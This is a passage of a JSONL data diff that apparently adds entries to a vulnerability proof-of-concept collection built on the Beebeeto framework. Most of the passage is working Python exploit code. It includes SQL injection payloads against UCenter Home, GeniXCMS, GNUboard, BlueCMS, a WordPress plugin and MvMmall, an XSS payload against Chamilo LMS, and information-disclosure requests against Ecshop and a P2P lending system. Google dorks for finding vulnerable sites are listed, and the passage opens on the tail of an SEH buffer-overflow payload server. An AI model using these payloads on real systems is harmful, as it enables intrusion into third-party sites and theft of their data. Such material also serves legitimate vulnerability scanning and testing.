\"\\x3b\\x58\\x00\\x00\"\r\n        buflen = len(buf)\r\n        response = \"\\x90\" *2048 + buf + \"\\xcc\" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ \"\\xcc\" * 7000\r\n        c.send(response)\r\n        c.close()\r\n        c, addr = s.accept()        # Establish connection with client.\r\n        # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.\r\n        if args['options']['verbose']:\r\n            print(('[*] Sending the payload second time', addr))\r\n        c.recv(1024)\r\n        c.send(response)\r\n        c.close()\r\n        s.close()\r\n        args['success'] = True\r\n        return args\r\n\r\n    verify = exploit\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)", "app_name": "Other", "id": "poc-2015-0072", "layer4_protocol": null}
+{"create_date": "2015-03-24 15:02:28", "name": "UCenter Home 2.0 /shop.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Discuz UCenter Home\u6f0f\u6d1e,/shop.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0069',\r\n            'name': 'UCenter Home 2.0 /shop.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-03-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['2.0'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['Discuz UCenter Home\u6f0f\u6d1e', '/shop.php\u6f0f\u6d1e', 'php'],\r\n            'desc': '''\r\n                    Script HomePage : http://u.discuz.net/\r\n                    Dork : Powered by UCenter inurl:shop.php?ac=view\r\n                    Dork 2 : inurl:shop.php?ac=view&shopid=\r\n                    ''',\r\n            'references': ['http://www.exploit-db.com/exploits/14997/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        payload = (\"/shop.php?ac=view&shopid=253 AND (SELECT 4650 FROM(SELECT COUNT(*),\"\r\n                   \"CONCAT(0x716b6a6271,(SELECT (CASE WHEN (4650=4650) THEN 1 ELSE 0 END)),\"\r\n                   \"0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\")\r\n        verify_url = url + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = requests.get(verify_url).content\r\n        if 'qkjbq1qxxpq1' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Script HomePage : http://u.discuz.net/\r\nDork : Powered by UCenter inurl:shop.php?ac=view\r\nDork 2 : inurl:shop.php?ac=view&shopid=", "app_name": "Discuz", "id": "poc-2015-0069", "layer4_protocol": null}
+{"create_date": "2015-03-20 15:16:01", "name": "Chamilo LMS 1.9.10 /main/calendar/agenda_list.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Chamilo LMS\u6f0f\u6d1e,xss\u6f0f\u6d1e,\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0068',\r\n            'name': 'Chamilo LMS 1.9.10 /main/calendar/agenda_list.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'user1018',\r\n            'create_date': '2015-03-20',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Chamilo LMS', \r\n            'vul_version': ['1.9.10'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Chamilo LMS\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://www.exploit-db.com/exploits/36435/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target'] + '/main/calendar/agenda_list.php'\r\n        verify_url = url + '?type=personal%27%3E%3Cscript%3Econfirm%281%29%3C%2fscript%3E%3C%21--'\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = response.read()\r\n        if \"<script>confirm(1)</script>\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0068", "layer4_protocol": null}
+{"create_date": "2015-03-18 14:42:11", "name": "GeniXCMS v0.0.1 /index.php SQL INJECTION POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "GeniXCMS SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0067',\r\n            'name': 'GeniXCMS v0.0.1 /index.php SQL INJECTION POC',\r\n            'author': 'ca2fux1n',\r\n            'create_date': '2015-03-11',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'GeniXCMS',\r\n            'vul_version': ['0.0.1'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['GeniXCMS SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php\u6f0f\u6d1e', 'php'],\r\n            'desc': 'GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploite',\r\n            'references': ['http://www.exploit-db.com/exploits/36321/',\r\n                           ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        payload = \"/genixcms/index.php?page=1' UNION ALL SELECT 1,2,md5('bb2'),4,5,6,7,8,9,10 and 'j'='j\"\r\n        verify_url = url + payload\r\n        content = requests.get(verify_url).content\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n            args['options']['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploite", "app_name": "Other", "id": "poc-2015-0067", "layer4_protocol": null}
+{"create_date": "2015-03-13 10:10:49", "name": "GNUboard /bbs/poll_update.php SQL Injection Vulnerability POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "GNUboard\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/bbs/poll_update.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0063',\r\n            'name': 'GNUboard /bbs/poll_update.php SQL Injection Vulnerability POC',\r\n            'author': '1024',\r\n            'create_date': '2015-03-13',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'GNUboard',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['GNUboard\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/bbs/poll_update.php', 'php'],\r\n            'desc': 'GNUboard \u901a\u7528\u578b\u6ce8\u5165SQL Injection\uff0c\u636e\u6d4b\u8bd5\u57fa\u672c\u4e0a\u5927\u90e8\u5206\u7684\u7248\u672c\u90fd\u53ef\u4ee5.',\r\n            'references': ['N/A',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        req = requests.get(url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + url\r\n        if req.status_code == 200:\r\n            po_ids = re.findall(r'name=\"po_id\" value=\"(\\d+)\"', req.content)\r\n            for po_id in po_ids:\r\n                verify_url = url + '/poll_update.php'\r\n                post = (\"_SERVER[REMOTE_ADDR]=86117&po_id=%s&gb_poll=1=1 and(select 1 from(select\"\r\n                        \"count(*),concat((select md5(123)),floor(rand(0)*2))x from information_schema.tables group by\"\r\n                        \"x)a)\") % po_id\r\n                if args['options']['verbose']:\r\n                    print '[*] Request URL: ' + verify_url\r\n                    print '[*] POST Content: ' + post\r\n                reqp = requests.post(verify_url, data=post)\r\n                if reqp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in reqp.content:\r\n                    args['success'] = True\r\n                    args['poc_ret']['vul_url'] = verify_url\r\n                    args['poc_ret']['post_content'] = post\r\n                    return args\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "GNUboard \u901a\u7528\u578b\u6ce8\u5165SQL Injection\uff0c\u636e\u6d4b\u8bd5\u57fa\u672c\u4e0a\u5927\u90e8\u5206\u7684\u7248\u672c\u90fd\u53ef\u4ee5.", "app_name": "Gnuboard", "id": "poc-2015-0063", "layer4_protocol": null}
+{"create_date": "2015-03-12 16:53:49", "name": "Ecshop /spellchecker.php \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Ecshop\u6f0f\u6d1e,Ecshop\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/spellchecker.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0060',\r\n            'name': 'Ecshop /spellchecker.php \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-03-12',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Ecshop',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Ecshop\u6f0f\u6d1e', 'Ecshop\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/spellchecker.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['https://www.bugscan.net/#!/n/293',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php'\r\n        verify_url = args['options']['target'] + payload\r\n        req = requests.get(verify_url)\r\n        if req.status_code == 200:\r\n            m = re.search('in <b>([^<]+)</b> on line <b>(\\d+)</b>', req.content)\r\n            if m:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                return args\r\n        args['success'] = False\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Ecshop", "id": "poc-2015-0060", "layer4_protocol": null}
+{"create_date": "2015-03-12 16:43:01", "name": "BlueCMS v1.6 sp1 /ad_js.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "BlueCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ad_js.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0059',\r\n            'name': 'BlueCMS v1.6 sp1 /ad_js.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-03-12',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'BlueCMS',\r\n            'vul_version': ['1.6'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['BlueCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ad_js.php', 'php'],\r\n            'desc': '''\r\n                    BlueCMS(\u5730\u65b9\u5206\u7c7b\u4fe1\u606f\u95e8\u6237\u4e13\u7528CMS\u7cfb\u7edf)\r\n                    \r\n                    $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //\u6839\u76ee\u5f55\u4e0b\u5176\u4ed6\u6587\u4ef6\u90fd\u505a\u4e86\u5f88\u597d\u7684\u8fc7\u6ee4\uff0c\r\n                    \u5bf9\u6570\u5b57\u578b\u53d8\u91cf\u51e0\u4e4e\u90fd\u7528\u4e86intval()\u505a\u9650\u5236\uff0c\u552f\u72ec\u6f0f\u4e86\u8fd9\u4e2a\u6587\u4ef6\uff0c\u5c45\u7136\u53ea\u662f\u7528\u4e86trim()\u53bb\u9664\u5934\u5c3e\u7a7a\u683c\u3002\r\n                    $ad = $db->getone(\"SELECT * FROM \".table('ad').\" WHERE ad_id =\".$ad_id); //\u76f4\u63a5\u4ee3\u5165\u67e5\u8be2\u3002\r\n                    ''',\r\n            'references': ['http://www.myhack58.com/Article/html/3/7/2010/27774_2.htm',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = \"/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)\"\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '63e1f04640e83605c1d177544a5a0488' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "BlueCMS(\u5730\u65b9\u5206\u7c7b\u4fe1\u606f\u95e8\u6237\u4e13\u7528CMS\u7cfb\u7edf)\r\n\r\n$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //\u6839\u76ee\u5f55\u4e0b\u5176\u4ed6\u6587\u4ef6\u90fd\u505a\u4e86\u5f88\u597d\u7684\u8fc7\u6ee4\uff0c\r\n\u5bf9\u6570\u5b57\u578b\u53d8\u91cf\u51e0\u4e4e\u90fd\u7528\u4e86intval()\u505a\u9650\u5236\uff0c\u552f\u72ec\u6f0f\u4e86\u8fd9\u4e2a\u6587\u4ef6\uff0c\u5c45\u7136\u53ea\u662f\u7528\u4e86trim()\u53bb\u9664\u5934\u5c3e\u7a7a\u683c\u3002\r\n$ad = $db->getone(\"SELECT * FROM \".table('ad').\" WHERE ad_id =\".$ad_id); //\u76f4\u63a5\u4ee3\u5165\u67e5\u8be2\u3002", "app_name": "Other", "id": "poc-2015-0059", "layer4_protocol": null}
+{"create_date": "2015-03-11 10:50:30", "name": "WordPress Calculated Fields Form 1.0.10 SQL Injection POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Ca2fux1n", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "WordPress SQL\u6ce8\u5165\u6f0f\u6d1e,Calculated Fields Form,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport time\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0057',\r\n            'name': 'WordPress Calculated Fields Form 1.0.10 SQL Injection POC',\r\n            'author': 'ca2fux1n',\r\n            'create_date': '2015-03-06',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress',\r\n            'vul_version': ['1.0.10'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['WordPress SQL\u6ce8\u5165\u6f0f\u6d1e', 'Calculated Fields Form', 'php'],\r\n            'desc': '''\r\n                    There are sql injection vulnerabilities in Calculated Fields Form Plugin\r\n                    which could allow the attacker to execute sql queries into database\r\n                    ''',\r\n            'references': ['http://www.exploit-db.com/exploits/36230/',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target']\r\n        payloads = {'/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and sleep(5)&name=InsertText',\r\n                    '/wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and sleep(5)',\r\n                    '/wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and sleep(5)'\r\n                    }\r\n        for payload in payloads:\r\n            verify_url += payload\r\n            start_time = time.time()\r\n            req = urllib2.Request(verify_url)\r\n            res_content = urllib2.urlopen(req).read()\r\n            if args['options']['verbose']:\r\n                print '[*]Request URL ' + verify_url\r\n            if time.time() - start_time > 5:\r\n                args['options']['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                break\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "There are sql injection vulnerabilities in Calculated Fields Form Plugin\r\nwhich could allow the attacker to execute sql queries into database", "app_name": "WordPress", "id": "poc-2015-0057", "layer4_protocol": null}
+{"create_date": "2015-03-09 21:41:25", "name": "MvMmall \u7f51\u5e97\u5546\u57ce\u7cfb\u7edf /search.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "MvMmall\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0056',\r\n            'name': 'MvMmall \u7f51\u5e97\u5546\u57ce\u7cfb\u7edf /search.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2015-03-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'MvMmall',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['MvMmall\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/search.php', 'php'],\r\n            'desc': '''\r\n                    mvmmall\u7f51\u5e97\u5546\u57ce\u7cfb\u7edf\u6700\u65b0\u6ce8\u51650day\u95ee\u9898\u51fa\u5728\u641c\u7d22search.php\u8fd9\u4e2a\u6587\u4ef6\u4e0a\u3002\r\n                    ''',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2011-01732',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from\"\r\n                   \"(select%20count(*),concat((select%20(select%20md5(12345))%20\"\r\n                   \"from%20information_schema.tables%20limit%200,1),floor(rand(0)\"\r\n                   \"*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20\"\r\n                   \"and%201=1%23\")\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '827ccb0eea8a706c4c34a16891f84e7b' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "mvmmall\u7f51\u5e97\u5546\u57ce\u7cfb\u7edf\u6700\u65b0\u6ce8\u51650day\u95ee\u9898\u51fa\u5728\u641c\u7d22search.php\u8fd9\u4e2a\u6587\u4ef6\u4e0a\u3002", "app_name": "MvMmall", "id": "poc-2015-0056", "layer4_protocol": null}
+{"create_date": "2015-03-09 14:17:52", "name": "\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf v3.0 /index.php?plugins \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/index.php?plugins,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0055',\r\n            'name': '\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf v3.0 /index.php?plugins \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n            'author': 'xiangshou',\r\n            'create_date': '2015-03-08',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf',\r\n            'vul_version': ['3.0'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/index.php?plugins', 'php'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/index.php',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2010-033114',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA=='\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'common.inc.php' in content and '$db_config' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url']= verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/index.php", "app_name": "\u53a6\u95e8\u5e1d\u7f51\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8", "id": "poc-2015-0055", "layer4_protocol": null}
